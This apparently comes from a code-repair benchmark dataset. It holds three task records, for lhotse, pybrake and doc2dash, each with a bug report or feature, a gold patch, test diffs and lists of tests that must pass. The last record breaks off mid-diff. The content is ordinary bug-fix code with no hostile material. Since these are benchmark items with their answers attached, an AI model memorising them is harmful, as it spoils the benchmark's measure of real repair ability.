+ ordered_cut_durations = sorted(zip(order, durations), key=lambda x: x[0])
+ last_order, first_bucket = 0, 0
+ last_bucket = num_buckets - 1
+ buckets_dict = {i: 0 for i in range(num_buckets)}
+ buckets_cut_dict = {i: [] for i in range(num_buckets)}
+ middle_bucket = None
+ idx_to_bucket_id = {}
+ for i, (order_idx, duration) in enumerate(ordered_cut_durations, 1):
+ # Check if we are at the middle bucket. first_bucket is the left bucket
+ # we are processing. last_bucket is the right bucket. When they are the
+ # same we are filling the bucket with cuts near the median duration.
+ if middle_bucket is None and first_bucket == last_bucket:
+ middle_bucket = first_bucket
+
+ # i % 2 = 1 ==> process the left_bucket (first_bucket)
+ if i % 2:
+ if buckets_dict[first_bucket] + duration > bucket_duration:
+ if middle_bucket is not None and first_bucket == middle_bucket:
+ first_bucket = min(middle_bucket - 1, num_buckets - 1)
+ else:
+ first_bucket = min(first_bucket + 1, num_buckets - 1)
+ buckets_dict[first_bucket] += duration
+ idx_to_bucket_id[order2idx[order_idx]] = first_bucket
+ # i % 2 = 0 ==> process the right bucket (last_bucket)
+ else:
+ if buckets_dict[last_bucket] + duration > bucket_duration:
+ if middle_bucket is not None and last_bucket == middle_bucket:
+ last_bucket = max(middle_bucket + 1, 0)
+ else:
+ last_bucket = max(last_bucket - 1, 0)
+ buckets_dict[last_bucket] += duration
+ idx_to_bucket_id[order2idx[order_idx]] = last_bucket
+
+ # Now that buckets have been assigned, create the new cutset.
+ for cut_idx, cut in enumerate(cuts):
+ buckets_cut_dict[idx_to_bucket_id[cut_idx]].append(cut)
+ buckets = [CutSet.from_cuts(buckets_cut_dict[i]) for i in range(num_buckets)]
return buckets
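To make the zigzag visiting order used by the patch above concrete, here is a small standalone check of the `order` computation (illustrative only, not part of the patch):

```python
n = 6  # pretend there are 6 cuts
order = list(range(0, n, 2)) + list(range(n - (1 + n % 2), 0, -2))
# order[i] is the position at which cut i gets assigned to a bucket
assert order == [0, 2, 4, 5, 3, 1]

# Recover the actual visiting sequence of cut indices:
visit_sequence = [i for _, i in sorted((pos, i) for i, pos in enumerate(order))]
assert visit_sequence == [0, 5, 1, 4, 2, 3]  # first, last, second, second-to-last, ...
```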
|
lhotse-speech/lhotse
|
1c137cf491f835dca25be92d5bf89272ec37b8fe
|
diff --git a/test/dataset/sampling/test_sampling.py b/test/dataset/sampling/test_sampling.py
index 4c922d40..1ed453ef 100644
--- a/test/dataset/sampling/test_sampling.py
+++ b/test/dataset/sampling/test_sampling.py
@@ -467,19 +467,29 @@ def test_bucketing_sampler_single_cuts_equal_duration():
)
# Ensure that each consecutive bucket has less cuts than the previous one
- prev_len = float("inf")
- bucket_cum_durs = []
+ sampled_cuts, bucket_cum_durs = [], []
+ prev_min, prev_max = 0, 0
+ num_overlapping_bins = 0
for (bucket,) in sampler.buckets:
- bucket_cum_durs.append(sum(c.duration for c in bucket))
- curr_len = len(bucket)
- assert curr_len < prev_len
- prev_len = curr_len
+ bucket_durs = [c.duration for c in bucket]
+ sampled_cuts.extend(c for c in bucket)
+ bucket_cum_durs.append(sum(bucket_durs))
+ bucket_min, bucket_max = min(bucket_durs), max(bucket_durs)
+ # Ensure that bucket lengths do not overlap, except for the middle
+ # 3 buckets maybe
+ if prev_max > bucket_min:
+ num_overlapping_bins += 1
+ assert num_overlapping_bins < 3
+ prev_min = bucket_min
+ prev_max = bucket_max
# Assert that all bucket cumulative durations are within 1/10th of the mean
mean_bucket_dur = mean(bucket_cum_durs) # ~ 1300s
for d in bucket_cum_durs:
assert abs(d - mean_bucket_dur) < 0.1 * mean_bucket_dur
+ assert set(cut_set.ids) == set(c.id for c in sampled_cuts)
+
def test_bucketing_sampler_shuffle():
cut_set = DummyManifest(CutSet, begin_id=0, end_id=10)
|
BucketingSampler with equal_duration drops an arbitrary(?) number of cuts.
If you use the BucketingSampler with equal_duration bucketing, especially with an even number of buckets (though it can also happen with an odd number), at the very least the last cut is dropped, and if you choose the durations and num_buckets appropriately you can have many more dropped.
The reason this is not caught in the test is that the line
`assert set(cut_set.ids) == set(c.id for c in sampled_cuts)`
is only called for the equal_length method and not the equal_duration method.
The problem arises from the fact that the loops in _create_buckets_equal_duration_single() do not iterate over the cuts, but over the buckets and each bucket's target duration. Because the last cut of every odd bucket is popped off and pushed back to the front of the iterator, the iterator can still be non-empty after the last bucket is filled.
At the very least, the BucketingSampler equal_duration feature should warn when it is used and report the number of cuts it has dropped; often that number will be 0 or 1.
However, if you modify `test_bucketing_sampler_single_cuts()` in test/dataset/sampling/test_sampling.py to look like the following, you will see that in this example it drops 25% of the cuts:
```python
def test_bucketing_sampler_single_cuts():
    cut_set = DummyManifest(CutSet, begin_id=0, end_id=1000)
    sampler = BucketingSampler(cut_set, sampler_type=SimpleCutSampler, bucket_method="equal_duration", num_buckets=500)
    print(f'Num cuts orig: {len(cut_set)}, Num cuts in sampler: {sum(len(b[0]) for b in sampler.buckets)}')
    sampled_cuts = []
    for batch in sampler:
        sampled_cuts.extend(batch)
    assert set(cut_set.ids) == set(c.id for c in sampled_cuts)
```
|
0.0
|
1c137cf491f835dca25be92d5bf89272ec37b8fe
|
[
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts_equal_duration"
] |
[
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_shuffling[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_shuffling[SingleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_shuffling[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-None-None-exception_expectation0]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[10.0-None-None-exception_expectation1]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-1000-None-exception_expectation2]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-None-160000-exception_expectation3]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-1000-160000-exception_expectation4]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[5.0-1000-160000-exception_expectation5]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_is_deterministic_given_epoch[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_is_deterministic_given_epoch[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_differs_between_epochs[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_differs_between_epochs[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_low_max_frames[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_low_max_frames[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler",
"test/dataset/sampling/test_sampling.py::test_dynamic_cut_sampler_as_cut_pairs_sampler",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_2",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-None-None-exception_expectation0]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[10.0-None-None-exception_expectation1]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-1000-None-exception_expectation2]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-None-160000-exception_expectation3]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-1000-160000-exception_expectation4]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[5.0-1000-160000-exception_expectation5]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_order_is_deterministic_given_epoch",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_order_differs_between_epochs",
"test/dataset/sampling/test_sampling.py::test_concat_cuts",
"test/dataset/sampling/test_sampling.py::test_concat_cuts_with_duration_factor",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts_no_proportional_sampling",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts_equal_len",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_shuffle",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_len[False]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_len[True]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_duration[False]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_duration[True]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_order_is_deterministic_given_epoch",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_order_differs_between_epochs",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_buckets_have_different_durations",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_chooses_buckets_randomly",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_time_constraints[constraint0]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_time_constraints[constraint1]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_time_constraints[constraint2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-995-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-995-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-995-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-996-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-996-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-996-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-997-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-997-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-997-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-998-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-998-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-998-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-999-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-999-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-999-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1000-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1000-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1000-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1001-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1001-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1001-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1002-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1002-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1002-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1003-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1003-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-1003-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-995-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-995-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-995-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-996-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-996-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-996-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-997-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-997-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-997-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-998-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-998-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-998-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-999-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-999-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-999-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1000-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1000-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1000-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1001-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1001-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1001-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1002-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1002-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1002-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1003-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1003-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[BucketingSampler-1003-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-995-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-995-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-995-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-996-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-996-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-996-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-997-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-997-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-997-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-998-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-998-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-998-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-999-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-999-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-999-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1000-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1000-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1000-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1001-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1001-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1001-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1002-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1002-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1002-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1003-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1003-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[DynamicCutSampler-1003-4]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_raises_value_error_on_lazy_cuts_input",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts_concat[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_with_lazy_cuts_concat[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_filter[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_filter[BucketingSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_filter[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_filter",
"test/dataset/sampling/test_sampling.py::test_zip_sampler_merge_batches_true",
"test/dataset/sampling/test_sampling.py::test_zip_sampler_cut_pairs_merge_batches_true",
"test/dataset/sampling/test_sampling.py::test_zip_sampler_merge_batches_false",
"test/dataset/sampling/test_sampling.py::test_round_robin_sampler",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_drop_last[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_drop_last[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_drop_last[False]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_drop_last[True]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>0]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>1]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>2]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>3]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>4]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>5]",
"test/dataset/sampling/test_sampling.py::test_sampler_get_report[<lambda>6]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>0]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>1]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>2]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>3]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>4]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>5]",
"test/dataset/sampling/test_sampling.py::test_sampler_diagnostics_accumulate_across_epochs[<lambda>6]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_lazy_shuffle[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_lazy_shuffle[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_lazy_shuffle[CutPairsSampler]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[100-10]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[100-1000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[100-20000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[1000-10]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[1000-1000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[1000-20000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[10000-10]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[10000-1000]",
"test/dataset/sampling/test_sampling.py::test_streaming_shuffle[10000-20000]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler0]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler1]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler2]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler3]",
"test/dataset/sampling/test_sampling.py::test_sampler_properties[sampler4]",
"test/dataset/sampling/test_sampling.py::test_report_padding_ratio_estimate",
"test/dataset/sampling/test_sampling.py::test_time_constraint_strictness",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[1-sampler_fn3]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[2-sampler_fn3]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[3-sampler_fn3]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-sampler_fn2]",
"test/dataset/sampling/test_sampling.py::test_sampler_does_not_drop_cuts_with_multiple_ranks[4-sampler_fn3]"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-05-27 00:33:01+00:00
|
apache-2.0
| 3,561
|
|
airbrake__pybrake-77
|
diff --git a/pybrake/notifier.py b/pybrake/notifier.py
index 9218c51..c673108 100644
--- a/pybrake/notifier.py
+++ b/pybrake/notifier.py
@@ -295,7 +295,7 @@ class Notifier:
needed = "/site-packages/"
ind = s.find(needed)
if ind > -1:
- s = "[SITE_PACKAGES]/" + s[ind + len(needed) :]
+ s = "/SITE_PACKAGES/" + s[ind + len(needed) :]
return s
s = s.replace(self._context["rootDirectory"], "/PROJECT_ROOT")
|
airbrake/pybrake
|
6970c56dfd3cf8caba339321f020ebc04d8129b0
|
diff --git a/pybrake/test_notifier.py b/pybrake/test_notifier.py
index e7bc2d9..8774ef8 100644
--- a/pybrake/test_notifier.py
+++ b/pybrake/test_notifier.py
@@ -205,3 +205,9 @@ def _test_rate_limited():
notice = future.result()
assert notice["error"] == "IP is rate limited"
+
+def test_clean_filename():
+ notifier = Notifier()
+
+ filename = notifier._clean_filename("home/lib/python3.6/site-packages/python.py")
+ assert filename == "/SITE_PACKAGES/python.py"
|
[SITE_PACKAGES] -> /SITE_PACKAGES
https://github.com/airbrake/pybrake/blob/master/pybrake/notifier.py#L298
|
0.0
|
6970c56dfd3cf8caba339321f020ebc04d8129b0
|
[
"pybrake/test_notifier.py::test_clean_filename"
] |
[
"pybrake/test_notifier.py::test_build_notice_from_exception",
"pybrake/test_notifier.py::test_build_notice_from_str",
"pybrake/test_notifier.py::test_build_notice_from_none",
"pybrake/test_notifier.py::test_environment",
"pybrake/test_notifier.py::test_root_directory",
"pybrake/test_notifier.py::test_filter_data",
"pybrake/test_notifier.py::test_filter_ignore",
"pybrake/test_notifier.py::test_filter_ignore_async",
"pybrake/test_notifier.py::test_unknown_host",
"pybrake/test_notifier.py::test_truncation",
"pybrake/test_notifier.py::test_revision_override",
"pybrake/test_notifier.py::test_revision_from_git",
"pybrake/test_notifier.py::test_keys_blacklist_exact",
"pybrake/test_notifier.py::test_keys_blacklist_regexp"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-03-23 12:37:51+00:00
|
mit
| 976
|
|
hynek__doc2dash-201
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index aa5dda5..12fe351 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Support for 2x icons using the `--icon-2x` option.
[#200](https://github.com/hynek/doc2dash/pull/200)
+- Support for linking to [docset playgrounds](https://kapeli.com/docsets#docsetPlaygrounds) using the `--playground-url` option.
+ [#201](https://github.com/hynek/doc2dash/pull/201)
+
### Fixed
diff --git a/docs/usage.md b/docs/usage.md
index 5bae7d0..c50e7fc 100644
--- a/docs/usage.md
+++ b/docs/usage.md
@@ -18,3 +18,5 @@ Basic usage is as simple as:
:prog_name: doc2dash
:style: table
:depth: 1
+
+Refer to our [how-to](how-to.md) and the official [*Docset Generation Guide*](https://kapeli.com/docsets) to learn what those options are good for.
diff --git a/src/doc2dash/__main__.py b/src/doc2dash/__main__.py
index 39d0eb6..e457c6a 100644
--- a/src/doc2dash/__main__.py
+++ b/src/doc2dash/__main__.py
@@ -136,6 +136,7 @@ IMPORTABLE = ImportableType()
"-u",
help="The base URL of the online documentation.",
)
+@click.option("--playground-url", help="The URL to a docset playground.")
@click.option(
"--parser",
"parser_type",
@@ -160,6 +161,7 @@ def main(
enable_js: bool,
online_redirect_url: str | None,
parser_type: type[Parser] | None,
+ playground_url: str | None,
) -> None:
"""
Convert docs from SOURCE to Dash's docset format.
@@ -222,6 +224,7 @@ def main(
index_page,
enable_js,
online_redirect_url,
+ playground_url,
icon,
icon_2x,
)
diff --git a/src/doc2dash/docsets.py b/src/doc2dash/docsets.py
index 1a4146e..5763dbc 100644
--- a/src/doc2dash/docsets.py
+++ b/src/doc2dash/docsets.py
@@ -37,6 +37,7 @@ def prepare_docset(
index_page: Path | None,
enable_js: bool,
online_redirect_url: str | None,
+ playground_url: str | None,
icon: Path | None,
icon_2x: Path | None,
) -> DocSet:
@@ -71,6 +72,8 @@ def prepare_docset(
plist_cfg["dashIndexFilePath"] = str(index_page)
if online_redirect_url is not None:
plist_cfg["DashDocSetFallbackURL"] = online_redirect_url
+ if playground_url is not None:
+ plist_cfg["DashDocSetPlayURL"] = playground_url
write_plist(plist_cfg, plist_path)
|
hynek/doc2dash
|
e8a4f374588dfb054cb1d984c9c5e72821588528
|
diff --git a/tests/test_docsets.py b/tests/test_docsets.py
index edbcae1..572419e 100644
--- a/tests/test_docsets.py
+++ b/tests/test_docsets.py
@@ -28,6 +28,7 @@ class TestPrepareDocset:
index_page=None,
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -72,6 +73,7 @@ class TestPrepareDocset:
index_page="foo.html",
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -105,6 +107,7 @@ class TestPrepareDocset:
index_page="foo.html",
enable_js=True,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -138,6 +141,7 @@ class TestPrepareDocset:
index_page="foo.html",
enable_js=False,
online_redirect_url="https://domain.com",
+ playground_url=None,
icon=None,
icon_2x=None,
)
@@ -156,6 +160,41 @@ class TestPrepareDocset:
"DashDocSetFallbackURL": "https://domain.com",
}
+ def test_with_playground_url(self, monkeypatch, tmp_path):
+ """
+ If a playground URL is passed, it is added to the plist.
+ """
+ monkeypatch.chdir(tmp_path)
+ m_ct = Mock()
+ monkeypatch.setattr(shutil, "copytree", m_ct)
+ (tmp_path / "bar").mkdir()
+
+ docset = docsets.prepare_docset(
+ Path("some/path/foo"),
+ Path("bar"),
+ name="foo",
+ index_page="foo.html",
+ enable_js=False,
+ online_redirect_url=None,
+ playground_url="https://repl.it/F9J7/1",
+ icon=None,
+ icon_2x=None,
+ )
+
+ p = docsets.read_plist(docset.plist)
+
+ assert p == {
+ "CFBundleIdentifier": "foo",
+ "CFBundleName": "foo",
+ "DocSetPlatformFamily": "foo",
+ "DashDocSetFamily": "python",
+ "DashDocSetDeclaredInStyle": "originalName",
+ "isDashDocset": True,
+ "dashIndexFilePath": "foo.html",
+ "isJavaScriptEnabled": False,
+ "DashDocSetPlayURL": "https://repl.it/F9J7/1",
+ }
+
def test_with_icon(self, tmp_path, sphinx_built):
"""
If an icon is passed, it's copied to the root of the docset.
@@ -170,6 +209,7 @@ class TestPrepareDocset:
index_page=None,
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=icon,
icon_2x=None,
)
@@ -190,6 +230,7 @@ class TestPrepareDocset:
index_page=None,
enable_js=False,
online_redirect_url=None,
+ playground_url=None,
icon=None,
icon_2x=icon,
)
diff --git a/tests/test_main.py b/tests/test_main.py
index 6897951..783f0e7 100644
--- a/tests/test_main.py
